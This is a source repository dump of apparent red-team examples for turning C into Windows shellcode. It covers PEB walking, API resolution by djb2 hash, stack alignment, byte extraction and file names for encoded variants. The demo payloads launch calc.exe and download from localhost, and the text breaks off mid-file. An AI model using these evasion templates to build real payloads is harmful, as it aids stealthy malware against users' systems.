├── CreateProcess ├── APIResolve.h ├── ApiResolve.c ├── CreateProcess.bin ├── CreateProcess.bin.sgn ├── CreateProcess.c ├── adjuststack.asm ├── extract.sh └── makefile ├── DownloadString_Syscalls ├── APIResolve.h ├── ApiResolve.c ├── DownloadString_Syscall.bin ├── DownloadString_Syscall.bin.sgn ├── DownloadString_Syscall.c ├── Syscalls.h ├── adjuststack.asm ├── extract.sh ├── makefile └── syscalls-asm.h ├── HelloWorld ├── APIResolve.h ├── ApiResolve.c ├── HelloWorld.bin ├── HelloWorld.bin.sgn ├── HelloWorld.c ├── adjuststack.asm ├── extract.sh └── makefile ├── Loaders └── loaderbuilder.py ├── README.md └── WMI_get_pid_service_evt ├── APIResolve.h ├── ApiResolve.c ├── WMI_get_pid_service_evt.bin ├── WMI_get_pid_service_evt.c ├── adjuststack.asm ├── extract.sh └── makefile /CreateProcess/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_CLOSEHANDLE 0x3870ca07 14 | #define HASH_CREATEPROCESSA 0xaeb52e19 15 | 16 | typedef BOOL(WINAPI* CLOSEHANDLE)(HANDLE); 17 | typedef BOOL(WINAPI* CREATEPROCESSA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION); 18 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 19 | 20 | typedef struct _UNICODE_STR { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | PWSTR pBuffer; 24 | } UNICODE_STR, * PUNICODE_STR; 25 | 26 | typedef struct _PEB_LDR_DATA 27 | { 28 | DWORD dwLength; 29 | DWORD dwInitialized; 30 | LPVOID lpSsHandle; 31 | LIST_ENTRY InLoadOrderModuleList; 32 | LIST_ENTRY InMemoryOrderModuleList; 33 | LIST_ENTRY InInitializationOrderModuleList; 34 | LPVOID lpEntryInProgress; 35 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 36 | 37 | typedef struct 
_LDR_DATA_TABLE_ENTRY 38 | { 39 | LIST_ENTRY InMemoryOrderModuleList; 40 | LIST_ENTRY InInitializationOrderModuleList; 41 | PVOID DllBase; 42 | PVOID EntryPoint; 43 | ULONG SizeOfImage; 44 | UNICODE_STR FullDllName; 45 | UNICODE_STR BaseDllName; 46 | ULONG Flags; 47 | SHORT LoadCount; 48 | SHORT TlsIndex; 49 | LIST_ENTRY HashTableEntry; 50 | ULONG TimeDateStamp; 51 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 52 | 53 | typedef struct _PEB_FREE_BLOCK 54 | { 55 | struct _PEB_FREE_BLOCK* pNext; 56 | DWORD dwSize; 57 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 58 | 59 | typedef struct __PEB 60 | { 61 | BYTE bInheritedAddressSpace; 62 | BYTE bReadImageFileExecOptions; 63 | BYTE bBeingDebugged; 64 | BYTE bSpareBool; 65 | LPVOID lpMutant; 66 | LPVOID lpImageBaseAddress; 67 | PPEB_LDR_DATA pLdr; 68 | LPVOID lpProcessParameters; 69 | LPVOID lpSubSystemData; 70 | LPVOID lpProcessHeap; 71 | PRTL_CRITICAL_SECTION pFastPebLock; 72 | LPVOID lpFastPebLockRoutine; 73 | LPVOID lpFastPebUnlockRoutine; 74 | DWORD dwEnvironmentUpdateCount; 75 | LPVOID lpKernelCallbackTable; 76 | DWORD dwSystemReserved; 77 | DWORD dwAtlThunkSListPtr32; 78 | PPEB_FREE_BLOCK pFreeList; 79 | DWORD dwTlsExpansionCounter; 80 | LPVOID lpTlsBitmap; 81 | DWORD dwTlsBitmapBits[2]; 82 | LPVOID lpReadOnlySharedMemoryBase; 83 | LPVOID lpReadOnlySharedMemoryHeap; 84 | LPVOID lpReadOnlyStaticServerData; 85 | LPVOID lpAnsiCodePageData; 86 | LPVOID lpOemCodePageData; 87 | LPVOID lpUnicodeCaseTableData; 88 | DWORD dwNumberOfProcessors; 89 | DWORD dwNtGlobalFlag; 90 | LARGE_INTEGER liCriticalSectionTimeout; 91 | DWORD dwHeapSegmentReserve; 92 | DWORD dwHeapSegmentCommit; 93 | DWORD dwHeapDeCommitTotalFreeThreshold; 94 | DWORD dwHeapDeCommitFreeBlockThreshold; 95 | DWORD dwNumberOfHeaps; 96 | DWORD dwMaximumNumberOfHeaps; 97 | LPVOID lpProcessHeaps; 98 | LPVOID lpGdiSharedHandleTable; 99 | LPVOID lpProcessStarterHelper; 100 | DWORD dwGdiDCAttributeList; 101 | LPVOID lpLoaderLock; 102 | DWORD dwOSMajorVersion; 103 | 
DWORD dwOSMinorVersion; 104 | WORD wOSBuildNumber; 105 | WORD wOSCSDVersion; 106 | DWORD dwOSPlatformId; 107 | DWORD dwImageSubsystem; 108 | DWORD dwImageSubsystemMajorVersion; 109 | DWORD dwImageSubsystemMinorVersion; 110 | DWORD dwImageProcessAffinityMask; 111 | DWORD dwGdiHandleBuffer[34]; 112 | LPVOID lpPostProcessInitRoutine; 113 | LPVOID lpTlsExpansionBitmap; 114 | DWORD dwTlsExpansionBitmapBits[32]; 115 | DWORD dwSessionId; 116 | ULARGE_INTEGER liAppCompatFlags; 117 | ULARGE_INTEGER liAppCompatFlagsUser; 118 | LPVOID lppShimData; 119 | LPVOID lpAppCompatInfo; 120 | UNICODE_STR usCSDVersion; 121 | LPVOID lpActivationContextData; 122 | LPVOID lpProcessAssemblyStorageMap; 123 | LPVOID lpSystemDefaultActivationContextData; 124 | LPVOID lpSystemAssemblyStorageMap; 125 | DWORD dwMinimumStackCommit; 126 | } _PEB, * _PPEB; 127 | -------------------------------------------------------------------------------- /CreateProcess/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = 
getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | // No need for additional dlls in this sample 44 | 45 | return ptr_loaded_dll; 46 | 47 | } 48 | 49 | static uint64_t 50 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 51 | 52 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 53 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 54 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 55 | 56 | uint32_t* ptr_exportadrtable = 0x00; 57 | uint32_t* ptr_namepointertable = 0x00; 58 | uint16_t* ptr_ordinaltable = 0x00; 59 | 60 | uint32_t idx_functions = 0x00; 61 | 62 | unsigned char* ptr_function_name = NULL; 63 | 64 | 65 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 66 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 67 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 68 | 69 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 70 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 71 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 72 | 73 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 74 | 75 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 76 | if (djb2(ptr_function_name) == function_hash) { 77 | WORD nameord = ptr_ordinaltable[idx_functions]; 78 | DWORD rva = ptr_exportadrtable[nameord]; 79 | return dll_base + rva; 80 | } 81 | 82 | } 83 | 84 | return 0; 85 | } 86 | 87 | 88 | 89 | static uint64_t 90 | getDllBase(unsigned long dll_hash) { 91 | 92 | _PPEB ptr_peb = NULL; 93 | PPEB_LDR_DATA ptr_ldr_data = NULL; 94 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 95 | 
PUNICODE_STR dll_name = NULL; 96 | 97 | ptr_peb = (_PEB*)__readgsqword(0x60); 98 | ptr_ldr_data = ptr_peb->pLdr; 99 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 100 | 101 | do{ 102 | 103 | dll_name = &ptr_module_entry->BaseDllName; 104 | 105 | if (dll_name->pBuffer == NULL) 106 | return 0; 107 | 108 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 109 | return (uint64_t)ptr_module_entry->DllBase; 110 | 111 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 112 | 113 | } while (ptr_module_entry != ptr_start_module); 114 | 115 | return 0; 116 | 117 | } 118 | 119 | static unsigned long 120 | djb2(unsigned char* str) 121 | { 122 | unsigned long hash = 5381; 123 | int c; 124 | 125 | while ((c = *str++)) 126 | hash = ((hash << 5) + hash) + c; 127 | 128 | return hash; 129 | } 130 | 131 | unsigned long 132 | unicode_djb2(const wchar_t* str) 133 | { 134 | 135 | unsigned long hash = 5381; 136 | DWORD val; 137 | 138 | while (*str != 0) { 139 | val = (DWORD)*str++; 140 | hash = ((hash << 5) + hash) + val; 141 | } 142 | 143 | return hash; 144 | 145 | } 146 | 147 | static WCHAR* 148 | toLower(WCHAR *str) 149 | { 150 | 151 | WCHAR* start = str; 152 | 153 | while (*str) { 154 | 155 | if (*str <= L'Z' && *str >= 'A') { 156 | *str += 32; 157 | } 158 | 159 | str += 1; 160 | 161 | } 162 | 163 | return start; 164 | 165 | } -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/CreateProcess/CreateProcess.bin -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.bin.sgn: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/CreateProcess/CreateProcess.bin.sgn -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | #define FAIL 0 4 | #define SUCCESS 1 5 | 6 | #ifdef _DEBUG 7 | int 8 | main(void) { 9 | #else 10 | int 11 | go(void) { 12 | #endif 13 | 14 | uint64_t _CloseHandle = getFunctionPtr(HASH_KERNEL32, HASH_CLOSEHANDLE); 15 | uint64_t _CreateProcessA = getFunctionPtr(HASH_KERNEL32, HASH_CREATEPROCESSA); 16 | 17 | if (_CloseHandle == 0x00 || _CreateProcessA == 0x00) 18 | return FAIL; 19 | 20 | STARTUPINFOA si; 21 | PROCESS_INFORMATION pi; 22 | 23 | DWORD dw_success = FAIL; 24 | 25 | char file[] = { 'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y','s','t','e', 'm','3','2','\\', 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', 0x00 }; 26 | 27 | for (uint8_t i = 0; i < sizeof(si); i++) 28 | *((uint8_t*)(&si) + i) = 0x00; 29 | 30 | for (uint8_t i = 0; i < sizeof(pi); i++) 31 | *((uint8_t*)(&pi) + i) = 0x00; 32 | 33 | si.cb = sizeof(si); 34 | 35 | dw_success = ((CREATEPROCESSA)_CreateProcessA)(0, file, 0, 0, TRUE, 0, 0, 0, &si, &pi); 36 | if (dw_success == FAIL) 37 | goto cleanup; 38 | 39 | dw_success = SUCCESS; 40 | 41 | cleanup: 42 | ((CLOSEHANDLE)_CloseHandle)(pi.hThread); 43 | ((CLOSEHANDLE)_CloseHandle)(pi.hProcess); 44 | 45 | 46 | return dw_success; 47 | 48 | } -------------------------------------------------------------------------------- /CreateProcess/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | 3 | extern go 4 | global alignstack 5 | 6 | segment .text 7 | 8 | 
alignstack: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call go 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /CreateProcess/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d CreateProcess.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> CreateProcess.bin 3 | -------------------------------------------------------------------------------- /CreateProcess/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh 5 | x86_64-w64-mingw32-gcc CreateProcess.c -Wall -m64 -masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o Createprocess.o -Wl,--no-seh 6 | x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o Createprocess.o -o CreateProcess.exe 7 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_VIRTUALALLOC 0x382c0f97 14 | #define HASH_VIRTUALFREE 0x668fcf2e 15 | 16 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 17 | typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); 18 | typedef BOOL(WINAPI* VIRTUALFREE)(LPVOID, SIZE_T, DWORD); 19 | 20 | // ---- 
USER32 ---- 21 | #define HASH_USER32 0x5a6bd3f3 22 | #define HASH_MESSAGEBOXA 0x384f14b4 23 | 24 | typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT); 25 | 26 | // ---- Wininet.dll ---- 27 | #define HASH_WININET 0x8dbd9c6d 28 | #define HASH_INTERNETOPENA 0xf4ad70a1 29 | #define HASH_INTERNETREADFILE 0xfb4f8eaa 30 | #define HASH_INTERNETCLOSEHANDLE 0x4241bef0 31 | #define HASH_INTERNETCONNECTA 0x44536159 32 | #define HASH_HTTPOPENREQUESTA 0xf0fcb9e1 33 | #define HASH_HTTPSENDREQUESTA 0x915115b9 34 | 35 | typedef HINTERNET(WINAPI* INTERNETOPENA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); 36 | typedef BOOL(WINAPI* INTERNETREADFILE)(HINTERNET, LPVOID, DWORD, LPDWORD); 37 | typedef BOOL(WINAPI* INTERNETCLOSEHANDLE)(HINTERNET); 38 | typedef HINTERNET(WINAPI* INTERNETCONNECTA)(HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); 39 | typedef HINTERNET(WINAPI* HTTPOPENREQUESTA)(HINTERNET, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR*, DWORD, DWORD_PTR); 40 | typedef BOOL(WINAPI* HTTPSENDREQUESTA)(HINTERNET, LPCSTR, DWORD, LPVOID, DWORD); 41 | 42 | typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR); 43 | 44 | typedef struct _UNICODE_STR { 45 | USHORT Length; 46 | USHORT MaximumLength; 47 | PWSTR pBuffer; 48 | } UNICODE_STR, * PUNICODE_STR; 49 | 50 | typedef struct _PEB_LDR_DATA 51 | { 52 | DWORD dwLength; 53 | DWORD dwInitialized; 54 | LPVOID lpSsHandle; 55 | LIST_ENTRY InLoadOrderModuleList; 56 | LIST_ENTRY InMemoryOrderModuleList; 57 | LIST_ENTRY InInitializationOrderModuleList; 58 | LPVOID lpEntryInProgress; 59 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 60 | 61 | typedef struct _LDR_DATA_TABLE_ENTRY 62 | { 63 | LIST_ENTRY InMemoryOrderModuleList; 64 | LIST_ENTRY InInitializationOrderModuleList; 65 | PVOID DllBase; 66 | PVOID EntryPoint; 67 | ULONG SizeOfImage; 68 | UNICODE_STR FullDllName; 69 | UNICODE_STR BaseDllName; 70 | ULONG Flags; 71 | SHORT LoadCount; 72 | SHORT TlsIndex; 73 | LIST_ENTRY HashTableEntry; 74 | ULONG TimeDateStamp; 75 | } 
LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 76 | 77 | typedef struct _PEB_FREE_BLOCK 78 | { 79 | struct _PEB_FREE_BLOCK* pNext; 80 | DWORD dwSize; 81 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 82 | 83 | typedef struct __PEB 84 | { 85 | BYTE bInheritedAddressSpace; 86 | BYTE bReadImageFileExecOptions; 87 | BYTE bBeingDebugged; 88 | BYTE bSpareBool; 89 | LPVOID lpMutant; 90 | LPVOID lpImageBaseAddress; 91 | PPEB_LDR_DATA pLdr; 92 | LPVOID lpProcessParameters; 93 | LPVOID lpSubSystemData; 94 | LPVOID lpProcessHeap; 95 | PRTL_CRITICAL_SECTION pFastPebLock; 96 | LPVOID lpFastPebLockRoutine; 97 | LPVOID lpFastPebUnlockRoutine; 98 | DWORD dwEnvironmentUpdateCount; 99 | LPVOID lpKernelCallbackTable; 100 | DWORD dwSystemReserved; 101 | DWORD dwAtlThunkSListPtr32; 102 | PPEB_FREE_BLOCK pFreeList; 103 | DWORD dwTlsExpansionCounter; 104 | LPVOID lpTlsBitmap; 105 | DWORD dwTlsBitmapBits[2]; 106 | LPVOID lpReadOnlySharedMemoryBase; 107 | LPVOID lpReadOnlySharedMemoryHeap; 108 | LPVOID lpReadOnlyStaticServerData; 109 | LPVOID lpAnsiCodePageData; 110 | LPVOID lpOemCodePageData; 111 | LPVOID lpUnicodeCaseTableData; 112 | DWORD dwNumberOfProcessors; 113 | DWORD dwNtGlobalFlag; 114 | LARGE_INTEGER liCriticalSectionTimeout; 115 | DWORD dwHeapSegmentReserve; 116 | DWORD dwHeapSegmentCommit; 117 | DWORD dwHeapDeCommitTotalFreeThreshold; 118 | DWORD dwHeapDeCommitFreeBlockThreshold; 119 | DWORD dwNumberOfHeaps; 120 | DWORD dwMaximumNumberOfHeaps; 121 | LPVOID lpProcessHeaps; 122 | LPVOID lpGdiSharedHandleTable; 123 | LPVOID lpProcessStarterHelper; 124 | DWORD dwGdiDCAttributeList; 125 | LPVOID lpLoaderLock; 126 | DWORD dwOSMajorVersion; 127 | DWORD dwOSMinorVersion; 128 | WORD wOSBuildNumber; 129 | WORD wOSCSDVersion; 130 | DWORD dwOSPlatformId; 131 | DWORD dwImageSubsystem; 132 | DWORD dwImageSubsystemMajorVersion; 133 | DWORD dwImageSubsystemMinorVersion; 134 | DWORD dwImageProcessAffinityMask; 135 | DWORD dwGdiHandleBuffer[34]; 136 | LPVOID lpPostProcessInitRoutine; 137 | LPVOID 
lpTlsExpansionBitmap; 138 | DWORD dwTlsExpansionBitmapBits[32]; 139 | DWORD dwSessionId; 140 | ULARGE_INTEGER liAppCompatFlags; 141 | ULARGE_INTEGER liAppCompatFlagsUser; 142 | LPVOID lppShimData; 143 | LPVOID lpAppCompatInfo; 144 | UNICODE_STR usCSDVersion; 145 | LPVOID lpActivationContextData; 146 | LPVOID lpProcessAssemblyStorageMap; 147 | LPVOID lpSystemDefaultActivationContextData; 148 | LPVOID lpSystemAssemblyStorageMap; 149 | DWORD dwMinimumStackCommit; 150 | } _PEB, * _PPEB; 151 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | 44 | if (dll_hash == HASH_USER32) { 45 | char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 }; 46 | ptr_loaded_dll 
= (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 47 | } else if (dll_hash == HASH_WININET) { 48 | char dll_name[] = { 'W', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd','l','l',0x00 }; 49 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 50 | } 51 | 52 | return ptr_loaded_dll; 53 | 54 | } 55 | 56 | static uint64_t 57 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 58 | 59 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 60 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 61 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 62 | 63 | uint32_t* ptr_exportadrtable = 0x00; 64 | uint32_t* ptr_namepointertable = 0x00; 65 | uint16_t* ptr_ordinaltable = 0x00; 66 | 67 | uint32_t idx_functions = 0x00; 68 | 69 | unsigned char* ptr_function_name = NULL; 70 | 71 | 72 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 73 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 74 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 75 | 76 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 77 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 78 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 79 | 80 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 81 | 82 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 83 | if (djb2(ptr_function_name) == function_hash) { 84 | WORD nameord = ptr_ordinaltable[idx_functions]; 85 | DWORD rva = ptr_exportadrtable[nameord]; 86 | return dll_base + rva; 87 | } 88 | 89 | } 90 | 91 | return 0; 92 | } 93 | 94 | 95 | 96 | static uint64_t 97 | getDllBase(unsigned long dll_hash) { 98 | 99 | _PPEB ptr_peb = NULL; 100 | PPEB_LDR_DATA ptr_ldr_data = NULL; 101 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = 
NULL; 102 | PUNICODE_STR dll_name = NULL; 103 | 104 | ptr_peb = (_PEB*)__readgsqword(0x60); 105 | ptr_ldr_data = ptr_peb->pLdr; 106 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 107 | 108 | do{ 109 | 110 | dll_name = &ptr_module_entry->BaseDllName; 111 | 112 | if (dll_name->pBuffer == NULL) 113 | return 0; 114 | 115 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 116 | return (uint64_t)ptr_module_entry->DllBase; 117 | 118 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 119 | 120 | } while (ptr_module_entry != ptr_start_module); 121 | 122 | return 0; 123 | 124 | } 125 | 126 | static unsigned long 127 | djb2(unsigned char* str) 128 | { 129 | unsigned long hash = 5381; 130 | int c; 131 | 132 | while ((c = *str++)) 133 | hash = ((hash << 5) + hash) + c; 134 | 135 | return hash; 136 | } 137 | 138 | unsigned long 139 | unicode_djb2(const wchar_t* str) 140 | { 141 | 142 | unsigned long hash = 5381; 143 | DWORD val; 144 | 145 | while (*str != 0) { 146 | val = (DWORD)*str++; 147 | hash = ((hash << 5) + hash) + val; 148 | } 149 | 150 | return hash; 151 | 152 | } 153 | 154 | static WCHAR* 155 | toLower(WCHAR *str) 156 | { 157 | 158 | WCHAR* start = str; 159 | 160 | while (*str) { 161 | 162 | if (*str <= L'Z' && *str >= 'A') { 163 | *str += 32; 164 | } 165 | 166 | str += 1; 167 | 168 | } 169 | 170 | return start; 171 | 172 | } -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/DownloadString_Syscalls/DownloadString_Syscall.bin -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.bin.sgn: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/DownloadString_Syscalls/DownloadString_Syscall.bin.sgn -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | #ifndef _DEBUG 3 | #include "Syscalls.h" 4 | #endif 5 | 6 | #define FAIL 0 7 | #define SUCCESS 1 8 | 9 | #define MAX_BUFFER 512 * 512 10 | 11 | #ifdef _DEBUG 12 | int 13 | main(void) { 14 | #else 15 | int 16 | go(void) { 17 | #endif 18 | 19 | uint64_t _InternetCloseHandle = getFunctionPtr(HASH_WININET, HASH_INTERNETCLOSEHANDLE); 20 | uint64_t _InternetOpenA = getFunctionPtr(HASH_WININET, HASH_INTERNETOPENA); 21 | uint64_t _InternetConnectA = getFunctionPtr(HASH_WININET, HASH_INTERNETCONNECTA); 22 | uint64_t _HttpOpenRequestA = getFunctionPtr(HASH_WININET, HASH_HTTPOPENREQUESTA); 23 | uint64_t _InternetReadFile = getFunctionPtr(HASH_WININET, HASH_INTERNETREADFILE); 24 | uint64_t _HttpSendRequestA = getFunctionPtr(HASH_WININET, HASH_HTTPSENDREQUESTA); 25 | uint64_t _VirtualFree = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALFREE); 26 | uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA); 27 | 28 | if ( _InternetCloseHandle == 0x00 || _InternetOpenA == 0x00 || _InternetConnectA == 0x00 || _HttpOpenRequestA == 0x00 || _InternetReadFile == 0x00 || _VirtualFree == 0x00 || _HttpSendRequestA == 0x00 || _MessageBoxA == 0x00) 29 | return FAIL; 30 | 31 | char hostname[] = { '1', '2', '7', '.', '0','.', '0', '.', '1', 0x00 }; 32 | char endpoint[] = { 'x', 0x00 }; 33 | uint32_t port = 80; 34 | HINTERNET h_session = NULL, h_connect = NULL, h_request = NULL; 35 | DWORD dw_read = 0, dw_read_total = 0, dw_success = FAIL; 36 | char method[] = { 'G', 'E', 'T', 0x00 }; 37 | 38 | SIZE_T 
